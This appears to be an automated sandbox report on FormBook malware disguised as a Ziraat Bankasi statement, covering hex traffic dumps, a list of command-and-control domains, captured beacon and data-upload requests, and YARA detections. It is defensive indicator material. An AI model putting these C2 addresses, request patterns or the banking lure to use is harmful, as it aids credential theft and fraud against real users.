2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 07:42:55 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 07:43:00 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 07:43:03 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.7dkjhk.com
          Source: explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.7dkjhk.com/ghii/
          Source: explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.assilajamiart.com
          Source: explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.assilajamiart.com/ghii/
          Source: explorer.exe, 00000003.00000002.523892470.0000000007A84000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.270321034.0000000007A84000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bemmulher.online
          Source: explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bemmulher.online/ghii/
          Source: explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cutgang.net
          Source: wlanext.exe, 00000009.00000002.513480459.0000000003085000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cutgang.net/
          Source: explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cutgang.net/ghii/
          Source: wlanext.exe, 00000009.00000002.516322379.00000000075D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cutgang.net/ghii/?xMjnfN-Y=ZjEpLe7oxQ70uLnf6hiyuc6pu0EMckSA0PTIEH8mULBl4PD4NIfksCJCZa9jgf
          Source: explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.de-nagel.com
          Source: explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.de-nagel.com/ghii/
          Source: explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.energybig.xyz
          Source: explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.energybig.xyz/ghii/
          Source: explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fluxgreenn.space
          Source: explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fluxgreenn.space/ghii/
          Source: explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.genuineinsights.cloud
          Source: explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.genuineinsights.cloud/ghii/
          Source: explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hubyazilim.com
          Source: explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hubyazilim.com/ghii/
          Source: explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ixirwholesale.xyz
          Source: explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ixirwholesale.xyz/ghii/
          Source: explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ladybillplanet.com
          Source: explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ladybillplanet.com/ghii/
          Source: explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nortonseecurity.com
          Source: explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nortonseecurity.com/ghii/
          Source: explorer.exe, 00000003.00000002.523669774.00000000072B7000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.octohoki.net
          Source: explorer.exe, 00000003.00000002.523669774.00000000072B7000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.octohoki.net/ghii/
          Source: explorer.exe, 00000003.00000002.528851137.00000000152DC000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000009.00000002.515844706.000000000401C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.searchvity.com/
          Source: explorer.exe, 00000003.00000002.528851137.00000000152DC000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000009.00000002.515844706.000000000401C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.searchvity.com/?dn=
          Source: explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sem-jobs.com
          Source: explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sem-jobs.com/ghii/
          Source: explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wenzid4.top
          Source: explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wenzid4.top/ghii/
          Source: explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wenzid4.toppOB
          Source: explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yeah-go.com
          Source: explorer.exe, 00000003.00000002.527715237.000000000F487000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yeah-go.com/ghii/
          Source: -912K03JO.9.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: -912K03JO.9.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: -912K03JO.9.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: wlanext.exe, 00000009.00000002.513480459.0000000003106000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: -912K03JO.9.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: explorer.exe, 00000003.00000002.528851137.000000001514A000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000009.00000002.515844706.0000000003E8A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Montserrat:200
          Source: wlanext.exe, 00000009.00000002.513480459.0000000003106000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: wlanext.exe, 00000009.00000002.513480459.0000000003106000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: wlanext.exe, 00000009.00000002.513480459.0000000003106000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: wlanext.exe, 00000009.00000002.513480459.0000000003106000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: wlanext.exe, 00000009.00000002.513480459.0000000003106000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: unknownHTTP traffic detected: POST /ghii/ HTTP/1.1Host: www.energybig.xyzConnection: closeContent-Length: 194Cache-Control: no-cacheOrigin: http://www.energybig.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.energybig.xyz/ghii/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4d 6a 6e 66 4e 2d 59 3d 4b 75 47 55 64 7a 32 39 51 61 76 34 54 6a 52 59 70 51 55 4d 57 62 6d 6d 78 61 4d 6b 79 5f 39 55 4e 6c 47 4b 61 56 4c 4b 45 49 63 36 6f 61 33 38 41 59 4f 7a 63 75 63 4f 67 76 50 7a 63 6a 32 59 63 59 75 70 38 5f 51 4d 71 55 61 38 69 69 71 32 38 63 37 5a 75 59 45 6c 68 79 38 6f 30 4f 39 71 50 67 4b 52 43 6c 57 50 30 65 39 31 6f 2d 6a 4c 48 4f 6c 4d 6d 79 41 46 70 56 46 6b 35 37 6b 5f 63 56 30 79 57 41 48 53 4d 39 63 35 69 59 46 42 54 43 61 63 43 4a 41 71 76 56 47 2d 57 30 44 34 28 52 31 65 48 6f 7e 71 52 4c 41 79 4e 4d 4c 62 54 39 6e 7a 43 4b 55 2e 00 00 00 00 00 00 00 00 Data Ascii: xMjnfN-Y=KuGUdz29Qav4TjRYpQUMWbmmxaMky_9UNlGKaVLKEIc6oa38AYOzcucOgvPzcj2YcYup8_QMqUa8iiq28c7ZuYElhy8o0O9qPgKRClWP0e91o-jLHOlMmyAFpVFk57k_cV0yWAHSM9c5iYFBTCacCJAqvVG-W0D4(R1eHo~qRLAyNMLbT9nzCKU.
          Source: unknownDNS traffic detected: queries for: www.wenzid4.top
          Source: global trafficHTTP traffic detected: GET /ghii/?P5V1e9=5El5vwlhmyt&xMjnfN-Y=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF3OATx/e31Ge81BxjFPOt13FZG HTTP/1.1Host: www.wenzid4.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?P5V1e9=5El5vwlhmyt&xMjnfN-Y=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7gk6B8rCsM/9BrBFmoNQDax5Q2 HTTP/1.1Host: www.energybig.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?xMjnfN-Y=b9pmEiWE3A9hICRLJ48/0GIWTdcguNEQkRUuEoMGZR2jfpcIS7+82C+h9uoa2hbDMoucG0FStkg6AqIGzw0g3xi7GVGpMQC8nL5ipoR7ehtO&P5V1e9=5El5vwlhmyt HTTP/1.1Host: www.genuineinsights.cloudConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?P5V1e9=5El5vwlhmyt&xMjnfN-Y=mbPzPtZ0Er8L5pad82wwGh9ocqcT3a4VC5lEcjpUbblZCC9rEfNiJ4Zzn4lMJLJJ2TaA1od8FsE8LCEUSFIoQK3x8J3agnpi0FJwMyByf64h HTTP/1.1Host: www.octohoki.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405809

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.oaqcoreqiw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.oaqcoreqiw.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.303606664.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303417878.0000000000DC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.513151308.0000000002BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.512971640.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.513376211.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 2.2.oaqcoreqiw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.oaqcoreqiw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.oaqcoreqiw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.oaqcoreqiw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.303606664.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.303606664.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.303417878.0000000000DC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.303417878.0000000000DC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.513151308.0000000002BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.513151308.0000000002BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.512971640.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
